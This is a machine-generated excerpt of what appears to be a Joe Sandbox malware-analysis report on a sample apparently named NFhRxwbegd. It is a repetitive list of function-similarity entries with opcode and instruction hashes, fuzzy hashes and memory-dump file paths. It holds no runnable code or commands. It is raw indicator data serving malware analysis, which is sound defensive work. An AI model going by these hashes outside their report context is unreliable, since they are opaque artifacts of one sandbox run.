                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                      • Instruction ID: 6fa8631faf6e5a45b58704d1a98364cc2aec299563f08abe6b241551b8705266
                                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                      • Instruction Fuzzy Hash: A701D232A00606AFE761DF58C900F5AFBADEB81B51F058424EE0DAB260E772DF40C790
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                      • Instruction ID: 007a090d7226a93ae47802959cbcad47936f1588ba5c79f8c36424e779a72f26
                                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                      • Instruction Fuzzy Hash: 1001043140473A9BDB258F199840A327BA6EB55B64700852DFC95CB281E331D600CB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc30df3cf99f14188a236163a42b207bbe729eb44e980b1c1ee8dfae09a65b16
                                                                      • Instruction ID: 9d5a666d7996489a28cded1db6d62007e03b0dbf8bc1057fe3ca1232e5c3e825
                                                                      • Opcode Fuzzy Hash: cc30df3cf99f14188a236163a42b207bbe729eb44e980b1c1ee8dfae09a65b16
                                                                      • Instruction Fuzzy Hash: BA11AD32241741EFDB25EF19CD90F16BBB8FF94B44F2400A9EA09DB661C635EE01CA90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42243230ae4f57122267ef6698c6334128fb73939599dba6d4f950e9288d7a6e
                                                                      • Instruction ID: 998c12813fe54b8ddbb48fd0e34e252356c19953c51129952a84e86775b72fbb
                                                                      • Opcode Fuzzy Hash: 42243230ae4f57122267ef6698c6334128fb73939599dba6d4f950e9288d7a6e
                                                                      • Instruction Fuzzy Hash: 9C115A7158122DABDB26EB64CD42FE9B3B8BF44710F6041D4A319E61E0DA709E81CF84
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                      • Instruction ID: 66ded23d7af1a4c8cc99ab8678b088a16deb7cb09c071c69fafd3c15583eebd4
                                                                      • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                      • Instruction Fuzzy Hash: 4F01D871604355AFEF269B59D804B9B7FA9EB40B50F154019AA0A9B2C0D774EDB0C3E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                      • Instruction ID: 661b255dfbeb6a146aa3b72555bfd3eb1e4733b2b0e5f132511325c986dbd937
                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                      • Instruction Fuzzy Hash: 400147326002108BEF119E2ED880B92B77BBFC4700F5941E9ED09CF24ADA72CD81C7A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 921b2e904914882d9d7c9a641dda822a75ac339cdde45c49fc76b64098a36d1d
                                                                      • Instruction ID: 286047f5c6b413d1813d5815357892fea0b77b21d72ae819a43d28e04080fddd
                                                                      • Opcode Fuzzy Hash: 921b2e904914882d9d7c9a641dda822a75ac339cdde45c49fc76b64098a36d1d
                                                                      • Instruction Fuzzy Hash: 29111B77900119ABCB11DB95CC84DDFB77CEF48254F044166A906E7211EA34AA55CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a504069b72882a284411ea5bc0fe1f8b61457fcb46b4f2c1e961fabb282c21a
                                                                      • Instruction ID: 675aedf3d98d28b364e3bcdd746b809df08bf2f370ba280242e443617767f240
                                                                      • Opcode Fuzzy Hash: 4a504069b72882a284411ea5bc0fe1f8b61457fcb46b4f2c1e961fabb282c21a
                                                                      • Instruction Fuzzy Hash: E311AD366441469FD711CF68D811BA6BBBDFB9A314F088159E848CB326D732EC81CBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fc391313ac5f729f261290e4f382be96ffd600d7cadd3da497a1d85b25077fc
                                                                      • Instruction ID: cf8bda9b8b8921d2b30591d6321d720c2961149757e9d9d9e49a3bdc590062c1
                                                                      • Opcode Fuzzy Hash: 3fc391313ac5f729f261290e4f382be96ffd600d7cadd3da497a1d85b25077fc
                                                                      • Instruction Fuzzy Hash: C31118B1E0020D9FCB00DFA9D541AAEBBF8FF58350F10406AA905E7351D674EE018BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cc0156d118bbcf62c06586591cce77e97bcdcb90e6d7776431c7c2ccadf3e217
                                                                      • Instruction ID: 39b7da8b6f73880fda2a0940a8de9bd35b37c446922f833f63811184c68ff75b
                                                                      • Opcode Fuzzy Hash: cc0156d118bbcf62c06586591cce77e97bcdcb90e6d7776431c7c2ccadf3e217
                                                                      • Instruction Fuzzy Hash: 6801F271240701AFD3319F1AD840F12BFE8EF55F50F01482EB24A8F3A0C6B09A408B55
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 179b76565f5130774dadf9e0bb46116cee6b6cdc4154fa41a9a1079b41d41bbe
                                                                      • Instruction ID: 1c966304116405e29d6ea66ece5c26801a1eb09934d8abb3fe69bcd4704ce7df
                                                                      • Opcode Fuzzy Hash: 179b76565f5130774dadf9e0bb46116cee6b6cdc4154fa41a9a1079b41d41bbe
                                                                      • Instruction Fuzzy Hash: 80F0A432641B21B7C7319B5A9D44F57BFBEEBC4B90F154029BA0AD7640DA30EE01DAA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction ID: 013e513935749e91bbb320444006ae415af1a4aae8bb67eda6745679b6def677
                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                      • Instruction Fuzzy Hash: E7F062B2A00615ABD324CF4DDC40E67FBEADBD5B94F058129A659D7220EA31DE05CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction ID: e45cb7fe0c951b19d195bff159ee0698adc89dae0ce52a9c159a83194a5ab679
                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                      • Instruction Fuzzy Hash: 76F0C273244A239BD732566D9840B2BAA958FD2F64F1A003DF20EDB204CB74CF0297D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction ID: 117d82acee7fce24ecc226a975d49ae8e71287ea0a7670ac8099bfc831857a32
                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                      • Instruction Fuzzy Hash: 3601D1326006859FD723966DC809F59BBDCEF41B54F0845A5FE089B6A1E679C940C211
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a54c33eb9e769cb5aaf8e241bfedaa42474afc4e8bc13c065dd4bc57c764145d
                                                                      • Instruction ID: f0720e155c0a0f3d6da296d394f3dd4bf70b4e8cca7f9f166681cb5a150cdcbe
                                                                      • Opcode Fuzzy Hash: a54c33eb9e769cb5aaf8e241bfedaa42474afc4e8bc13c065dd4bc57c764145d
                                                                      • Instruction Fuzzy Hash: BA018F71A0024D9FCB00DFA9D445AEEBBF8BF58310F14005AE905F7280D734EA01CB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction ID: 89349cdaf8749bbbba3a8e39ccc85092609c5aa6c1389784fbb5485b96525f25
                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                      • Instruction Fuzzy Hash: 07F01D7220001DBFEF019F95DD80DAF7BBEEB59798B104125FA15A2160D631DE21ABA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad572aac30f31cfb67094ec0c8eaa21b2cef5c3609f6f213d8bea70e18310930
                                                                      • Instruction ID: 8a0c6d5bf5e860fae4ece6e7ea99dfde58698a3f989857615e16260d3e21fab0
                                                                      • Opcode Fuzzy Hash: ad572aac30f31cfb67094ec0c8eaa21b2cef5c3609f6f213d8bea70e18310930
                                                                      • Instruction Fuzzy Hash: 67018936100109AFCF129F84D840EDE3F66FB4C754F068201FE1866220C332D971EB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bda2178ef2220cab1d1f922e6d8439f6f0b342bc838b6c3fcf88288ed23a385
                                                                      • Instruction ID: 6b945187f423c418920e5e49860354b245cd7d2ba7d25c960915db415897e458
                                                                      • Opcode Fuzzy Hash: 1bda2178ef2220cab1d1f922e6d8439f6f0b342bc838b6c3fcf88288ed23a385
                                                                      • Instruction Fuzzy Hash: CFF0F0712046415BF224A61A8C01B22329AE7C0B50F69806FEB0DCB281EB71DA018294
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cb040b38b0511e8edb25e2d3a279d7dcae658056d3cbcceaf990787b46ca91b
                                                                      • Instruction ID: 75534bcfb46d37368ace20402f895cc817c69b186b0867fb7a519c7025b9cf1c
                                                                      • Opcode Fuzzy Hash: 0cb040b38b0511e8edb25e2d3a279d7dcae658056d3cbcceaf990787b46ca91b
                                                                      • Instruction Fuzzy Hash: 9F01AF713047869FF3239B2CCE48F2937E8BB41B05F480590BA09EBAD6E729D841C610
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                      • Instruction ID: 3fe312b90b3958f4bfc49e2e2ac406d406b429bbc14fe3be1ef51f92f37f8028
                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                      • Instruction Fuzzy Hash: 88F08935381E1347E776BA2D9520B3AA699AFD0E52B05052D965DCB6C1DF60DC018790
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e4a4cd204887ffb40e7d665bd372a91e1df5e78f54b69c95e03d1c49e8d4575
                                                                      • Instruction ID: 503d22620f636db7829b9f761ebf2ac194336e1dc656f3eed6cf226681bce370
                                                                      • Opcode Fuzzy Hash: 6e4a4cd204887ffb40e7d665bd372a91e1df5e78f54b69c95e03d1c49e8d4575
                                                                      • Instruction Fuzzy Hash: A2D0A930A09002CFDF2BCF88CA18E3E3AB8FF10B41B4000ACFB0992120E328DC01DA20
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction ID: 23abbd58fdfb7dd5da2b6b959f51a4873adcadf2b98080a5c514c661cc5f6960
                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                      • Instruction Fuzzy Hash: B4C01232290648AFC712AA99CD01F027BA9EBA8B40F000061F6058B670C631ED20EA84
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction ID: cfddaebe6939ab92a5595f827ac67b7b9249bdd3d6bbc878d80a5608d0eb554f
                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                      • Instruction Fuzzy Hash: 08D01236100248EFCB01DF45C890D9A772BFBD8710F10801DFD19076118A31ED62DA50
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction ID: 13cb029baa44f1231b3606da54cd7dca493c1afa8b912a0e6fbae39ab8e8b800
                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                      • Instruction Fuzzy Hash: 5BC04879B01A468FDF16DB6ED2D8F5977E8FB44741F1508D0E809DBB22E628ED01CA11
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                      • Instruction ID: 45df0e23749c6b90897157c285de7ec6af17deababfcc0a243b83d19b8e52169
                                                                      • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                      • Instruction Fuzzy Hash: E1B01232212545CFC7026724CB00B1877AABF017C0F0900F46600C9830E628CA10E502
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44e971be29a88aae1b0347a119e3abe095e76a649033d78d2ff5f22693186f1c
                                                                      • Instruction ID: 903bc80d57bd9a4fd6150546066038c8ef8d3f8055820058b554bfe3eb75a552
                                                                      • Opcode Fuzzy Hash: 44e971be29a88aae1b0347a119e3abe095e76a649033d78d2ff5f22693186f1c
                                                                      • Instruction Fuzzy Hash: 3F900231605910129140715848895468089A7E0301B55C011E0464554CCE148A565361
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6caa3ef914b64842a9531f1d21f86ff8ba99d062c5855f393949d6d8dfdd9321
                                                                      • Instruction ID: 077196ec4bb5d07169b771bee2d52f77becc63ea619e8ae34ecc7819f633e34d
                                                                      • Opcode Fuzzy Hash: 6caa3ef914b64842a9531f1d21f86ff8ba99d062c5855f393949d6d8dfdd9321
                                                                      • Instruction Fuzzy Hash: B690026160161042414071584809406A089A7E1301395C115E0594560CCA1889559369
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6938f1eeaf35718b93c8bbad141d23a7a9dddc4665dfcb982612275e22b089c0
                                                                      • Instruction ID: 99b55eb35b9009897149c10a98908766475953ae213402e6d23545261c0be2cf
                                                                      • Opcode Fuzzy Hash: 6938f1eeaf35718b93c8bbad141d23a7a9dddc4665dfcb982612275e22b089c0
                                                                      • Instruction Fuzzy Hash: D690023120151802D10471584809686408997D0301F55C011E6064655EDA6589917231
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6831970b3f4c6fd1459f705cd15195ce341829153eb11f01a173dbf12d7e5a7a
                                                                      • Instruction ID: 486f2b21ecea132971a9d015f1525d94963f02f213e49b0c3119c882591622c4
                                                                      • Opcode Fuzzy Hash: 6831970b3f4c6fd1459f705cd15195ce341829153eb11f01a173dbf12d7e5a7a
                                                                      • Instruction Fuzzy Hash: 8390023160551802D15071584419746408997D0301F55C011E0064654DCB558B5577A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 452b757cc0974f72e74a87cce75e7e2ce44b6b635bf3f2fe1c50a6182ccb63b3
                                                                      • Instruction ID: a765e2636401e8f389eebfbe84a064fba2a409b0351ef4c3fbf3660b00b69d0e
                                                                      • Opcode Fuzzy Hash: 452b757cc0974f72e74a87cce75e7e2ce44b6b635bf3f2fe1c50a6182ccb63b3
                                                                      • Instruction Fuzzy Hash: D690023120151802D1807158440964A408997D1301F95C015E0065654DCE158B5977A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe8fe47faf30df0cb7588ea665b5c0f8989dcb10799d6b8a7f22dfb1c7227dd9
                                                                      • Instruction ID: e2300f64123ed4d3afa5c73b90b3529b1718218f572b32c6359867e0be0a03c5
                                                                      • Opcode Fuzzy Hash: fe8fe47faf30df0cb7588ea665b5c0f8989dcb10799d6b8a7f22dfb1c7227dd9
                                                                      • Instruction Fuzzy Hash: DE90023120555842D14071584409A46409997D0305F55C011E00A4694DDA258E55B761
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f6208bab2b797dbad572aeea65e7e811c7ce5bae3a0fa9ef2ccfc28053ee818
                                                                      • Instruction ID: b98b1edae9f0e7ddff44e6b752c12d467be553917d336485a26f7af61b5c28a4
                                                                      • Opcode Fuzzy Hash: 6f6208bab2b797dbad572aeea65e7e811c7ce5bae3a0fa9ef2ccfc28053ee818
                                                                      • Instruction Fuzzy Hash: D69002A1201650924500B2588409B0A858997E0201B55C016E1094560CC92589519235
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb5ea9e543d75c8e0dae2f544d0528c2748aefca3b6014d807b465d414515f24
                                                                      • Instruction ID: 838216a85772282258a7e87d83b91bcffb7479218136210e6cd257dbcfb8f2b9
                                                                      • Opcode Fuzzy Hash: cb5ea9e543d75c8e0dae2f544d0528c2748aefca3b6014d807b465d414515f24
                                                                      • Instruction Fuzzy Hash: 17900435311510030105F55C070D50740CFD7D5351355C031F1055550CDF31CD715331
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42b4f9643eb527ff9553ccd5e61ff198c189cb47153965e0be52855d6fc12ef1
                                                                      • Instruction ID: f000eac1f27bb64a73d3039be72787b833f21c8378a21d235389d11608eb7882
                                                                      • Opcode Fuzzy Hash: 42b4f9643eb527ff9553ccd5e61ff198c189cb47153965e0be52855d6fc12ef1
                                                                      • Instruction Fuzzy Hash: E1900225221510020145B558060950B44C9A7D6351395C015F1456590CCA2189655321
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbe5c528d271e3bd1dfd92f15f52be8917921be16368f57322730e701cdf02e3
